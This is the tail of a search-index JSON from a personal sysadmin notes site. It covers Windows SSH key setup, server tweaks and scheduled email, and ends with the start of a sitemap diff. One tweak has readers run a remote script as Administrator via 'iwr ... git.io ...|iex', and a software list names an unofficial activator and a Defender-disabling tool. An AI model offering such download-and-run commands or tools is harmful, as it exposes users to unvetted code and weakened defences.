", "tags": ["windows", "ssh-server", "powershell", "rsa-keys"]}, {"location": "windows/ssh-server/#adding-ssh-keys", "title": "Adding SSH Keys", "text": "", "tags": ["windows", "ssh-server", "powershell", "rsa-keys"]}, {"location": "windows/ssh-server/#administrator-user", "title": "Administrator User", "text": "Create the file: administrators_authorized_keys
at the following location:
C:\\ProgramData\\ssh\\administrators_authorized_keys\n
Edit the file and add you SSH public key to the file.
Now we need to import the SSH public key to the Windows SSH server. We can do this by using the following command:
icacls.exe \"C:\\ProgramData\\ssh\\administrators_authorized_keys\" /inheritance:r /grant \"Administrators:F\" /grant \"SYSTEM:F\"\n
Test the SSH connection to the Windows server from remote machine with the SSH Key. You should be able to connect to the Windows server with your SSH key
", "tags": ["windows", "ssh-server", "powershell", "rsa-keys"]}, {"location": "windows/ssh-server/#regular-user-non-administrator", "title": "Regular User (non-administrator)", "text": "Create a .ssh
directory in the home directory of the user.
```path\nC:\\Users\\<username>\\.ssh\\\n
Create the file: authorized_keys
at the following location:
C:\\Users\\<username>\\.ssh\\authorized_keys\n
Edit the file and add you SSH public key to the file.
Test the SSH connection to the Windows server from remote machine with the SSH Key. You should be able to connect with non-administrator user to the Windows server with your SSH key
", "tags": ["windows", "ssh-server", "powershell", "rsa-keys"]}, {"location": "windows/ssh-server/#powershell-as-default-shell-for-ssh", "title": "PowerShell
as Default Shell for SSH", "text": "By default the SSH client uses the Windows command prompt as the default shell.
We can change the default shell to PowerShell running the following PowerShell command:
New-ItemProperty -Path \"HKLM:\\SOFTWARE\\OpenSSH\" -Name DefaultShell -Value \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -PropertyType String -Force\n
Next to you connet to the Windows SSG server it should start the PowerShell shell.
It should look something like this:
", "tags": ["windows", "ssh-server", "powershell", "rsa-keys"]}, {"location": "windows/useful-software/", "title": "Useful Software", "text": "", "tags": ["utilities", "windows"]}, {"location": "windows/useful-software/#win-10-iso-official-download", "title": "Win 10 ISO Official Download", "text": "Microsoft Official Windows 10 Download
", "tags": ["utilities", "windows"]}, {"location": "windows/useful-software/#list-of-useful-software", "title": "List of Useful Software", "text": "Application Description MAS Windows & Office Activation Windows Tweaker 4 for Windows 10 Windows Tweaker Defender Control Windows Defender control Link Shell Extension Symlinks For Windows Winaero Tweaker Winaero Tweaker Autologon Autologon at boot", "tags": ["utilities", "windows"]}, {"location": "windows/windows-servers/", "title": "Windows Servers", "text": "", "tags": ["utilities", "windows", "servers"]}, {"location": "windows/windows-servers/#basic-setup", "title": "Basic Setup", "text": "At Server Manager click Configure this local server
Computer name - rename the server's name Remote Desktop - allow RDP Ethernet instance - disable IPV6 Feedback & Diagnostics - set Feedback frequency
to Never
IE Enhanced Security Configuration - Off Time zone - set the current timezone, At Internet Time
tab chanche time.windwos.com
to time.nist.gov
Open gpedit.msc with Run
Local Computer Policy -> Administrative Templates -> System -> Display Shutdown Even Tracker - Disable Local Computer Policy -> Windows Settings -> Security Settings -> Local Policies -> Security Options ->Interactive logon: Do not require CTRL+ALT+DEL - Enable ", "tags": ["utilities", "windows", "servers"]}, {"location": "windows/windows-servers/#convert-evaluation-copy-to-full-version", "title": "Convert Evaluation Copy to Full Version", "text": "When using the Evaluation version of Windows Server, the desktop displays the current build and the time until the end of the grace period (Windows License valid for 180 days).
", "tags": ["utilities", "windows", "servers"]}, {"location": "windows/windows-servers/#windows-server-2022", "title": "Windows Server 2022", "text": "Run from Powershell:
Windows Server 2022 Standard
dism /online /set-edition:serverstandard /productkey:VDYBN-27WPP-V4HQT-9VMD4-VMK7H /accepteula\n
Windows Server 2022 Datacenter:
dism /online /set-edition:serverdatacenter /productkey:WX4NM-KYWYW-QJJR4-XV3QB-6VM33 /accepteula\n
", "tags": ["utilities", "windows", "servers"]}, {"location": "windows/windows-servers/#windows-server-2019", "title": "Windows Server 2019", "text": "Run from Powershell:
Windows Server 2019 Standard
dism /online /set-edition:ServerStandard /productkey:N69G4-B89J2-4G8F4-WWYCC-J464C /accepteula\n
Windows Server 2019 Datacenter:
dism /online /set-edition:ServerDatacenter /productkey:WMDGN-G9PQG-XVVXX-R3X43-63DFG /accepteula\n
", "tags": ["utilities", "windows", "servers"]}, {"location": "windows/windows-ssh-agent-with-keys/", "title": "Windows SSH Client with ed25519 Keys for Secure Connections", "text": "In the modern digital age, ensuring the security of your connections is critical. This guide will walk you through the steps to configure the SSH client and SSH agent on Windows using ed25519 keys, allowing for secure connections to services like Git and remote servers.
", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-ssh-agent-with-keys/#introduction-to-ssh-and-ed25519-keys", "title": "Introduction to SSH and ed25519 Keys", "text": "SSH, or Secure Shell, is a cryptographic network protocol for secure communication over an unsecured network. It is particularly used for secure logins, file transfers, and command-line operations.
ed25519 is a public-key signature system that is renowned for high security with relatively short key lengths. This makes it faster and more efficient compared to older algorithms such as RSA.
", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-ssh-agent-with-keys/#openssh-client-installation", "title": "OpenSSH Client Installation", "text": "To utilize SSH, you need to ensure that the OpenSSH client is installed on your Windows system.
Note
The above below should be performed in PowerShell with Administrator privileges.
Check if OpenSSH Client is available by running the following cmdlet: Get-WindowsCapability -Online | Where-Object Name -like 'OpenSSH*'\n
If OpenSSH Client is not installed, the output will be:
Name: OpenSSH.Client~~~~0.0.1.0\nState: NotPresent\n
If it's not present, proceed to the next step to install it.
Install the OpenSSH Client by running the following command: # Install the OpenSSH Client\nAdd-WindowsCapability -Online -Name OpenSSH.Client~~~~0.0.1.0\n
The command should return:
Path:\nOnline: True\nRestartNeeded: False\n
", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-ssh-agent-with-keys/#setting-up-ssh-agent-in-windows", "title": "Setting Up SSH Agent in Windows", "text": "The SSH Agent is a background service that stores your keys. When connecting to a remote host using SSH, the agent can automatically provide the key.
Note
The above below should be performed in PowerShell with Administrator privileges.
Set SSH Agent to start automatically at boot: Set-Service -Name ssh-agent -StartupType 'Automatic'\n
Start the SSH Agent service: Start-Service -Name ssh-agent\n
Test the SSH Agent Is Running: Get-Service -Name ssh-agent\n
The output should be:
Status Name DisplayName\n------ ---- -----------\nRunning ssh-agent OpenSSH Authentication Agent\n
", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-ssh-agent-with-keys/#generating-and-adding-ed25519-ssh-keys", "title": "Generating and Adding ed25519 SSH Keys", "text": "Note
The above below should be performed in PowerShell with regular user privileges.
Generate ed25519 SSH keys: ssh-keygen -t ed25519 -C \"your_email@example.com\"\n
This command generates an ed25519 key pair. The default location for the keys is C:\\Users\\<YourUsername>\\.ssh
. The private key is named id_ed25519
and the public key is named id_ed25519.pub
.
Adding the ed25519 SSH Key to the SSH Agent: ssh-add $env:USERPROFILE\\.ssh\\id_ed25519\n
If your keys are stored in a different location or have a different name, you can specify the full path to the key file as an argument to ssh-add
. For example:
ssh-add C:\\path\\to\\your\\private-key-file\n
", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-ssh-agent-with-keys/#importing-existing-ed25519-ssh-keys-optional", "title": "Importing Existing ed25519 SSH Keys (Optional)", "text": "If you already have an existing pair of ed25519 SSH keys that you would like to use, you can import them into your SSH Agent.
Note
The above below should be performed in PowerShell with regular user privileges.
Copy your existing private key to the default SSH folder. The default folder for SSH keys is typically C:\\Users\\<YourUsername>\\.ssh
. Make sure the private key file you are copying is named id_ed25519
.
Add the existing ed25519 SSH Key to the SSH Agent:
ssh-add $env:USERPROFILE\\.ssh\\id_ed25519\n
Note: If your private key file is located in a different path or has a different name, you can specify the full path to the key file as an argument to ssh-add
. For example:
ssh-add C:\\path\\to\\your\\private-key-file\n
Copy your existing public key to the servers or services you want to connect to. This typically involves appending the contents of your public key file to the ~/.ssh/authorized_keys
file on the server. ", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-ssh-agent-with-keys/#step-5-using-ssh-with-ed25519-keys-for-secure-connections", "title": "Step 5: Using SSH with ed25519 Keys for Secure Connections", "text": "Now that you have your ed25519 SSH keys generated or imported, and added to the SSH Agent, you can use SSH to connect to remote servers or services like Git securely.
For example, to connect to a remote server:
ssh username@remote_host\n
Using SSH keys will also allow you to interact with Git repositories securely, which is especially helpful when dealing with private repositories or pushing code changes.
", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-ssh-agent-with-keys/#wrapping-up", "title": "Wrapping Up", "text": "By following this guide, you have configured the SSH client and SSH agent on your Windows system using ed25519 keys. This configuration ensures secure communication with services like Git and remote servers, safeguarding the integrity and security of your data.
", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-tweaks/", "title": "Windwos 10/11 Tweeks", "text": "Some tips and tricks and Tweeks for Windows 10/11 that may be helpful or even essential for you
", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/windows-tweaks/#deblot-windwos-1011-powershell-script", "title": "Deblot Windwos 10/11 Powershell Script", "text": "Source: Windows10Debloater Github Page
Run as Administrator:
iwr -useb https://git.io/debloat|iex\n
", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/windows-tweaks/#enable-the-legacy-context-menu-in-windows-11", "title": "Enable the Legacy Context Menu in Windows 11", "text": "To enable the context menu that appeared in Windows 10 and earlier, you can use the following PowerShell snippet.
New-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\\InprocServer32\" -Value \"\" -Force\n
You may need to log out and log back in or restart\u00a0explorer.exe
.
Get-Process explorer | Stop-Process\n
The context menu will now look like this:
", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/windows-tweaks/#allow-icmp-ping-in-windows-firewall", "title": "Allow ICMP (Ping) in Windows Firewall", "text": "The following commands will allow ICMP (Ping) in Windows Firewall. Use Powershell as Administrator to run the following commands.
For IPv4:
netsh advfirewall firewall add rule name=\"ICMP Allow incoming V4 echo request\" protocol=\"icmpv4:8,any\" dir=in action=allow\n
For IPv6:
netsh advfirewall firewall add rule name=\"ICMP Allow incoming V6 echo request\" protocol=\"icmpv6:8,any\" dir=in action=allow\n
", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/windows-tweaks/#activate-administrator-user", "title": "Activate Administrator User", "text": "Hit the Windows Key + R and type
lusrmgr.msc\n
Edit Administrator, remove the - [x] Account is disable. ok
Right Click on Administrator and click Set Password
", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/windows-tweaks/#lunch-network-connections", "title": "Lunch \"Network Connections\"", "text": "Hit the Windows Key + R and type
ncpa.cpl\n
", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/windows-tweaks/#add-program-to-startup-windows-7810-servers", "title": "Add Program to Startup - Windows 7,8,10 & Servers", "text": "Hit WIN+R or from start menu search run
and press enter. At run dialog enter shell:common startup
:
Create shortcut for the program you want to auto startup when Windows boots. Move the shortcut to the Startup
folder that opened before. ", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/windows-tweaks/#reboot-or-shutdown-windows-from-command-line-cmd", "title": "Reboot or Shutdown Windows From Command Line (CMD)", "text": "Reboot windows computer This command will set a time out of 10 seconds to close the applications. After 10 seconds, windows reboot will start.
shutdown /r /t 10\n
Force reboot
shutdown /r /f /t 0\n
Force Shutdown
shutdown /s /f /t 0\n
", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/guides/declare-locations/", "title": "Declare Locations as \"Inside Your Local Network\"", "text": "Warning
The Intranet Zone is the most trusted and least protected zone. DO NOT put any subnets or IP addresses in this zone unless they are TOTALLY under YOUR control. That includes ANY public server, web site, subnet, or IP address.
Select 'Control Panel'/'Internet Properties'/'Security' tab. (Alternatively, open Internet Explorer and select 'Tools'/'Internet Options'/'Security' tab.)
Highlight 'Local Intranet' and click 'Sites'.
Set the following: Uncheck 'Automatically detect intranet network'.Check 'Include all local (intranet) sites not listed in other zones'.Uncheck 'Include all sites that bypass the proxy server'.Check 'Include all network paths (UNCs)'.\u200b
Click 'Advanced'
Uncheck 'Require server verification (https:) for all sites in this zone'.
In the field labeled 'Add this web site to the zone:', add your local, private subnet using an asterisk for a network mask and click 'Add'. E.g. If your home (local) network is 192.168.25.0 with a mask of 255.255.255.0, enter '192.168.25.*' (without the quotes).
Note
Entries can be:\u200b
* Individual IP addresses (e.g. '192.168.5.25', etc.),\n* Class C subnets (e.g. '192.168.27.*'),\n* Class B subnets (e.g. '172.16.*.*'), or\n* Class A subnets (e.g. '10.*.*.*')\u200b\n
You can add as many addresses as you need to the list It can be handy add the address of a VPN subnet to the list if it is also private and you TOTALLY trust it.\u200b
Close out with 'Close'/'OK'/'OK' and close the Control Panel (or Internet Explorer). ", "tags": ["utilities", "network", "windows"]}, {"location": "windows/guides/email-from-task-scheduler/", "title": "Send Emails From The Windows Task Scheduler", "text": "First, download SendEmail, a free (and open source) tool for sending emails from the command line. Extract the downloaded archive into a folder on your computer.
Next, launch the Windows Task Scheduler and create a new task \u2013 consult our guide to creating scheduled tasks for more information. You can create a task that automatically sends an email at a specific time or a task that sends an email in response to a specific event.
When you reach the Action window, select Start a program instead of Send an e-mail.
In the Program/script box, use the Browse button and navigate to the SendEmail.exe file on your computer.
Finally, you\u2019ll have to add the arguments required to authenticate with your SMTP server and construct your email. Here\u2019s a list of the options you can use with SendEmail:
", "tags": ["utilities", "windows"]}, {"location": "windows/guides/email-from-task-scheduler/#server-options", "title": "Server Options", "text": " -f EMAIL \u2013 The email address you\u2019re sending from. -s SERVER:PORT \u2013 The SMTP server and port it requires. -xu USERNAME \u2013 The username you need to authenticate with the SMTP server. -xp PASSWORD \u2013 The password you need to authenticate with the SMTP server. -o tls=yes \u2013 Enables TLS encryption. May be necessary for some SMTP servers. If you\u2019re using Gmail\u2019s SMTP servers, these are the server options you\u2019ll need:
-s smtp.gmail.com:587 -xu you@gmail.com -xp password -o tls=yes Of course, you\u2019ll have to enter your own email address and password here.
", "tags": ["utilities", "windows"]}, {"location": "windows/guides/email-from-task-scheduler/#destination-options", "title": "Destination Options", "text": " -t EMAIL \u2013 The destination email address. You can send an email to multiple addresses by including a space between each address after the -t option. -cc EMAIL \u2013 Any addresses you\u2019d like to CC on the email. You can specify multiple addresses by placing a space between each email address, just as with the -t command above. -bcc EMAIL \u2013 The BCC version of the CC option above. ", "tags": ["utilities", "windows"]}, {"location": "windows/guides/email-from-task-scheduler/#email-options", "title": "Email Options", "text": " -u SUBJECT \u2013 The subject of your email -m BODY \u2013 The message body text of your email. -a ATTACHMENT \u2013 The path of a file you\u2019d like to attach. This is optional. For example, let\u2019s say your email address is example@gmail.com and you\u2019d like to send an email to person@example.com
. You\u2019d use the following options:
-f example@gmail.com -t person@example.com -u Subject -m This is the body text! -s smtp.gmail.com:587 -xu example@gmail.com -xp password -o tls=yes\n
Once you\u2019ve put together your options, copy and paste them into the Add arguments box.
Save your task and you\u2019re done. Your task will automatically send email on the schedule (or in response to the event) you specified.
", "tags": ["utilities", "windows"]}, {"location": "tags/", "title": "Tags and Categories", "text": ""}, {"location": "tags/#3g-modem", "title": "3g-modem", "text": " 3g Modem Host Configuration "}, {"location": "tags/#cookies", "title": "Cookies", "text": ""}, {"location": "tags/#git", "title": "Git", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#homelab", "title": "HomeLab", "text": ""}, {"location": "tags/#iid", "title": "IID", "text": " IID Generator & Validator "}, {"location": "tags/#nas", "title": "NAS", "text": " Synology NAS Free 80,443 Ports "}, {"location": "tags/#openssh", "title": "OpenSSH", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#proxmox", "title": "Proxmox", "text": ""}, {"location": "tags/#ssh", "title": "SSH", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#security", "title": "Security", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#synology", "title": "Synology", "text": ""}, {"location": "tags/#tweeks", "title": "Tweeks", "text": ""}, {"location": "tags/#ubuntu", "title": "Ubuntu", "text": ""}, {"location": "tags/#virtio", "title": "VirtIO", "text": ""}, {"location": "tags/#windows", "title": "Windows", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#windows-virtual-machines", "title": "Windows Virtual Machines", "text": ""}, {"location": "tags/#windwos", "title": "Windwos", "text": ""}, {"location": "tags/#adb", "title": "adb", "text": ""}, {"location": "tags/#admonition", "title": "admonition", "text": ""}, {"location": "tags/#affiliate", "title": "affiliate", "text": ""}, {"location": "tags/#android", "title": "android", "text": " ADB Cheat Sheet Apktool PT Application JADX Decompiler MobSF SSL Pinning Bypass "}, {"location": "tags/#apktool", "title": "apktool", "text": ""}, {"location": "tags/#application", "title": "application", "text": ""}, {"location": "tags/#autofs", "title": "autofs", "text": ""}, {"location": "tags/#automation", "title": "automation", "text": " DDNS Cloudflare Bash DDNS Cloudflare PowerShell Syncthing Motion Sensor Display Control "}, {"location": "tags/#bash", "title": "bash", "text": " DDNS Cloudflare Bash BrewUp "}, {"location": "tags/#cheat-sheet", "title": "cheat-sheet", "text": " ADB Cheat Sheet Npm Command-line Utility PM2 - Node.js Process Manager Pip Package Manager Supervisor Process Manager Virtual Environment Ruby Gem Package Manager Common Docker Commands Containers Cheat Sheet Images Cheat Sheet Docker Installation Networks & Links Cheat Sheet Security & Best Practices Git Cli Cheat Sheet Submodules Cheat Sheet GitHub Cli "}, {"location": "tags/#cheatsheet", "title": "cheatsheet", "text": " Gobuster CheatSheet Nmap CheatSheet XSS CheatSheet "}, {"location": "tags/#chrome", "title": "chrome", "text": ""}, {"location": "tags/#cli", "title": "cli", "text": ""}, {"location": "tags/#clickjacking", "title": "clickjacking", "text": ""}, {"location": "tags/#cloudflare", "title": "cloudflare", "text": " DDNS Cloudflare Bash DDNS Cloudflare PowerShell Pi-hole Cloudflare DNS Sync Let's Encrypt with Cloudflare UDM Cloudflare DDNS "}, {"location": "tags/#code-blocks", "title": "code-blocks", "text": ""}, {"location": "tags/#collation", "title": "collation", "text": ""}, {"location": "tags/#commands", "title": "commands", "text": ""}, {"location": "tags/#container", "title": "container", "text": ""}, {"location": "tags/#content-tabs", "title": "content-tabs", "text": ""}, {"location": "tags/#ddns", "title": "ddns", "text": " DDNS Cloudflare Bash DDNS Cloudflare PowerShell "}, {"location": "tags/#debian", "title": "debian", "text": ""}, {"location": "tags/#decompiler", "title": "decompiler", "text": ""}, {"location": "tags/#diagram", "title": "diagram", "text": ""}, {"location": "tags/#dns", "title": "dns", "text": " Pi-hole Cloudflare DNS Sync Pi-hole with DOH on Docker Free Port 53 on Ubuntu "}, {"location": "tags/#dns-over-https", "title": "dns-over-https", "text": " Pi-hole with DOH on Docker "}, {"location": "tags/#docker", "title": "docker", "text": " Pi-hole Cloudflare DNS Sync Pi-hole with DOH on Docker Common Docker Commands Containers Cheat Sheet Images Cheat Sheet Docker Installation Networks & Links Cheat Sheet Security & Best Practices Watchtower Docker on Raspberry Pi "}, {"location": "tags/#docker-compose", "title": "docker-compose", "text": ""}, {"location": "tags/#doh", "title": "doh", "text": " Pi-hole with DOH on Docker "}, {"location": "tags/#dsm", "title": "dsm", "text": ""}, {"location": "tags/#ed25519", "title": "ed25519", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#edgerouter", "title": "edgerouter", "text": ""}, {"location": "tags/#emojis", "title": "emojis", "text": ""}, {"location": "tags/#endorsements", "title": "endorsements", "text": ""}, {"location": "tags/#extensions", "title": "extensions", "text": " Chrome Extensions Firefox Extensions "}, {"location": "tags/#external-markdown", "title": "external-markdown", "text": ""}, {"location": "tags/#files-handling", "title": "files-handling", "text": ""}, {"location": "tags/#firefox", "title": "firefox", "text": ""}, {"location": "tags/#frida", "title": "frida", "text": ""}, {"location": "tags/#gem", "title": "gem", "text": ""}, {"location": "tags/#git_1", "title": "git", "text": " Git Cli Cheat Sheet GitHub Cli "}, {"location": "tags/#github", "title": "github", "text": " Removing Sensitive Data Git Cli Cheat Sheet Submodules Cheat Sheet GitHub Cli BrewUp "}, {"location": "tags/#gpu", "title": "gpu", "text": ""}, {"location": "tags/#headings", "title": "headings", "text": ""}, {"location": "tags/#history", "title": "history", "text": ""}, {"location": "tags/#homebrew", "title": "homebrew", "text": ""}, {"location": "tags/#horizontal-line", "title": "horizontal-line", "text": ""}, {"location": "tags/#htpasswd", "title": "htpasswd", "text": " htpasswd Password Generator "}, {"location": "tags/#iterm2", "title": "iTerm2", "text": ""}, {"location": "tags/#icons", "title": "icons", "text": ""}, {"location": "tags/#igpu", "title": "igpu", "text": " iGPU Passthrough to VM iGPU Split Passthrough "}, {"location": "tags/#images", "title": "images", "text": ""}, {"location": "tags/#information", "title": "information", "text": " Affiliate Disclosure Cookies Policy Website Endorsements MIT License Privacy Policy "}, {"location": "tags/#ipv6", "title": "ipv6", "text": " Disable IPv6 on Proxmox Disable IPv6 via Grub "}, {"location": "tags/#java", "title": "java", "text": ""}, {"location": "tags/#kali", "title": "kali", "text": ""}, {"location": "tags/#kali-linux", "title": "kali-linux", "text": ""}, {"location": "tags/#letsencrypt", "title": "letsencrypt", "text": " Let's Encrypt with Cloudflare "}, {"location": "tags/#license", "title": "license", "text": ""}, {"location": "tags/#links", "title": "links", "text": ""}, {"location": "tags/#linux", "title": "linux", "text": " Syncthing Better Terminal Experience Files Handling General Snippets Locales & Timezone LVM Partitions Memory & Swap SSH Hardening with SSH Keys Identify Network Interfaces "}, {"location": "tags/#lists", "title": "lists", "text": ""}, {"location": "tags/#locales", "title": "locales", "text": ""}, {"location": "tags/#lvm", "title": "lvm", "text": ""}, {"location": "tags/#macos", "title": "macOS", "text": " Applications Tweaks Enable Root User TouchID for sudo UI Tweaks Brew Snippets "}, {"location": "tags/#maco", "title": "maco", "text": " Pyenv-virtualenv Multi Version "}, {"location": "tags/#macos_1", "title": "macos", "text": " Syncthing Better Terminal Experience SSH Passphrase to Keychain Terminal Snippets BrewUp "}, {"location": "tags/#magic-mirror", "title": "magic-mirror", "text": ""}, {"location": "tags/#magicmirror", "title": "magicmirror", "text": ""}, {"location": "tags/#markdown", "title": "markdown", "text": " Disable IPV6 oh-my-zsh Install Snippets Awesome Pages Plugin "}, {"location": "tags/#markdown-cheatsheet", "title": "markdown-cheatsheet", "text": " About Markdown Admonitions Basic Formatting Code Blocks Content Tabs Diagrams Embed External Markdown Icons & Emojis Images Links Tables, Lists and Quotes "}, {"location": "tags/#mermaid", "title": "mermaid", "text": ""}, {"location": "tags/#metasploit", "title": "metasploit", "text": ""}, {"location": "tags/#mkdocs", "title": "mkdocs", "text": " About Markdown Admonitions Basic Formatting Code Blocks Content Tabs Diagrams Embed External Markdown Icons & Emojis Images Links Tables, Lists and Quotes "}, {"location": "tags/#motion-sensor", "title": "motion-sensor", "text": " Motion Sensor Display Control "}, {"location": "tags/#mount", "title": "mount", "text": ""}, {"location": "tags/#network", "title": "network", "text": " Proxmox Networking Identify Network Interfaces Declare Locations as \"Inside Your Local Network\" "}, {"location": "tags/#node", "title": "node", "text": " Npm Command-line Utility PM2 - Node.js Process Manager "}, {"location": "tags/#npm", "title": "npm", "text": " Npm Command-line Utility PM2 - Node.js Process Manager "}, {"location": "tags/#oh-my-zsh", "title": "oh-my-zsh", "text": " Better Terminal Experience oh-my-zsh on Synology NAS "}, {"location": "tags/#package-manager", "title": "package-manager", "text": " Pip Package Manager Ruby Gem Package Manager "}, {"location": "tags/#passthrough", "title": "passthrough", "text": " GPU Passthrough to VM iGPU Passthrough to VM iGPU Split Passthrough vGPU Split Passthrough "}, {"location": "tags/#penetration-testing", "title": "penetration-testing", "text": " Apktool PT Application MobSF Cli Commands Collation Gobuster CheatSheet Nmap CheatSheet XSS CheatSheet Bettercap 1.6.2 Installation Kali Linux "}, {"location": "tags/#pi-hole", "title": "pi-hole", "text": " Pi-hole Cloudflare DNS Sync Pi-hole with DOH on Docker "}, {"location": "tags/#pip", "title": "pip", "text": ""}, {"location": "tags/#pm2", "title": "pm2", "text": " PM2 - Node.js Process Manager "}, {"location": "tags/#portfolio", "title": "portfolio", "text": ""}, {"location": "tags/#ports", "title": "ports", "text": ""}, {"location": "tags/#powershell", "title": "powershell", "text": " DDNS Cloudflare PowerShell Windows SSH Server "}, {"location": "tags/#privacy-policy", "title": "privacy policy", "text": ""}, {"location": "tags/#process-manager", "title": "process-manager", "text": " PM2 - Node.js Process Manager "}, {"location": "tags/#processes-manager", "title": "processes-manager", "text": " Supervisor Process Manager "}, {"location": "tags/#proxmox_1", "title": "proxmox", "text": " Cloud Image Template Let's Encrypt with Cloudflare PVE Kernel Cleaner VM Disk Expander GPU Passthrough to VM iGPU Passthrough to VM iGPU Split Passthrough vGPU Split Passthrough Disable IPv6 on Proxmox Proxmox Networking "}, {"location": "tags/#pt", "title": "pt", "text": " Cli Commands Collation Links and Tools Metasploit Framework Wifite About Proxmark3 Proxmark3 CheatSheet Mifare Classic 1K ISO14443A Clickjacking Test Page IID Generator & Validator "}, {"location": "tags/#python", "title": "python", "text": " Pip Package Manager Supervisor Process Manager Virtual Environment Pyenv-virtualenv Multi Version "}, {"location": "tags/#quotes", "title": "quotes", "text": ""}, {"location": "tags/#raspberry-pi", "title": "raspberry-pi", "text": " Docker on Raspberry Pi External Power Button Motion Sensor Display Control Snippets 3g Modem Host Configuration Magic Mirror 2.0 Magic Mirror "}, {"location": "tags/#resume", "title": "resume", "text": ""}, {"location": "tags/#reverse-engineering", "title": "reverse-engineering", "text": ""}, {"location": "tags/#rfid", "title": "rfid", "text": " About Proxmark3 Proxmark3 CheatSheet Mifare Classic 1K ISO14443A "}, {"location": "tags/#rsa", "title": "rsa", "text": " SSH Hardening with SSH Keys "}, {"location": "tags/#rsa-keys", "title": "rsa-keys", "text": " SSH With RSA Keys Windows SSH Server "}, {"location": "tags/#ruby", "title": "ruby", "text": ""}, {"location": "tags/#security_1", "title": "security", "text": ""}, {"location": "tags/#servers", "title": "servers", "text": ""}, {"location": "tags/#share", "title": "share", "text": ""}, {"location": "tags/#smb", "title": "smb", "text": ""}, {"location": "tags/#snippets", "title": "snippets", "text": ""}, {"location": "tags/#ssh_1", "title": "ssh", "text": " Enable SSH Root Login SSH With RSA Keys SSH Hardening with SSH Keys "}, {"location": "tags/#ssh-server", "title": "ssh-server", "text": ""}, {"location": "tags/#ssl-pinning", "title": "ssl-pinning", "text": ""}, {"location": "tags/#submodules", "title": "submodules", "text": ""}, {"location": "tags/#supervisor", "title": "supervisor", "text": " Supervisor Process Manager "}, {"location": "tags/#syncthing", "title": "syncthing", "text": ""}, {"location": "tags/#synology_1", "title": "synology", "text": " Syncthing oh-my-zsh on Synology NAS Install VM Tools on Virtual Machine Auto DSM Config Backup Free 80,443 Ports Enable SSH Root Login SSH With RSA Keys "}, {"location": "tags/#tables", "title": "tables", "text": ""}, {"location": "tags/#template", "title": "template", "text": " Disable IPV6 oh-my-zsh Install Snippets Awesome Pages Plugin "}, {"location": "tags/#terminal", "title": "terminal", "text": " Better Terminal Experience TouchID for sudo "}, {"location": "tags/#text-highlighting", "title": "text-highlighting", "text": ""}, {"location": "tags/#timezone", "title": "timezone", "text": ""}, {"location": "tags/#tools", "title": "tools", "text": " Gobuster CheatSheet Nmap CheatSheet XSS CheatSheet Bettercap 1.6.2 Installation Links and Tools Metasploit Framework Wifite About Proxmark3 Proxmark3 CheatSheet Mifare Classic 1K ISO14443A Clickjacking Test Page IID Generator & Validator "}, {"location": "tags/#touchid", "title": "touchID", "text": ""}, {"location": "tags/#ubiquiti", "title": "ubiquiti", "text": " EdgeRouter CLI Commands Failover Telegram Notifications Persistent Boot Script Persistent SSH Keys Better Fan Speeds UDM Cloudflare DDNS Wireguard VPN "}, {"location": "tags/#ubuntu_1", "title": "ubuntu", "text": " Disable IPv6 via Grub Remove Snap Store Unattended Upgrades "}, {"location": "tags/#udm", "title": "udm", "text": " CLI Commands Failover Telegram Notifications Persistent Boot Script Persistent SSH Keys Better Fan Speeds UDM Cloudflare DDNS Wireguard VPN "}, {"location": "tags/#unifi", "title": "unifi", "text": " CLI Commands Failover Telegram Notifications Persistent Boot Script Persistent SSH Keys Better Fan Speeds UDM Cloudflare DDNS Wireguard VPN "}, {"location": "tags/#utilities", "title": "utilities", "text": " Useful Links & Tools Wifi QR Image Generator Useful Software Windows Servers Declare Locations as \"Inside Your Local Network\" Send Emails From The Windows Task Scheduler "}, {"location": "tags/#venv", "title": "venv", "text": ""}, {"location": "tags/#vgpu", "title": "vgpu", "text": ""}, {"location": "tags/#virtualization", "title": "virtualization", "text": " Cloud Image Template VM Disk Expander "}, {"location": "tags/#vmware", "title": "vmware", "text": ""}, {"location": "tags/#vmware-fusion", "title": "vmware-fusion", "text": ""}, {"location": "tags/#watchtower", "title": "watchtower", "text": ""}, {"location": "tags/#wifi", "title": "wifi", "text": ""}, {"location": "tags/#windows_1", "title": "windows", "text": " Syncthing Windows SSH Server Useful Software Windows Servers Declare Locations as \"Inside Your Local Network\" Send Emails From The Windows Task Scheduler "}, {"location": "tags/#wireguard", "title": "wireguard", "text": ""}, {"location": "tags/#zsh", "title": "zsh", "text": " Better Terminal Experience "}]}
\ No newline at end of file
diff --git a/sitemap.xml b/sitemap.xml
new file mode 100644
index 000000000..d96b03938
--- /dev/null
+++ b/sitemap.xml
@@ -0,0 +1,688 @@
+
+
+
+ https://3os.org/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/blog/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/tags/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/android/adb-cheat-sheet/
+ 2023-11-26
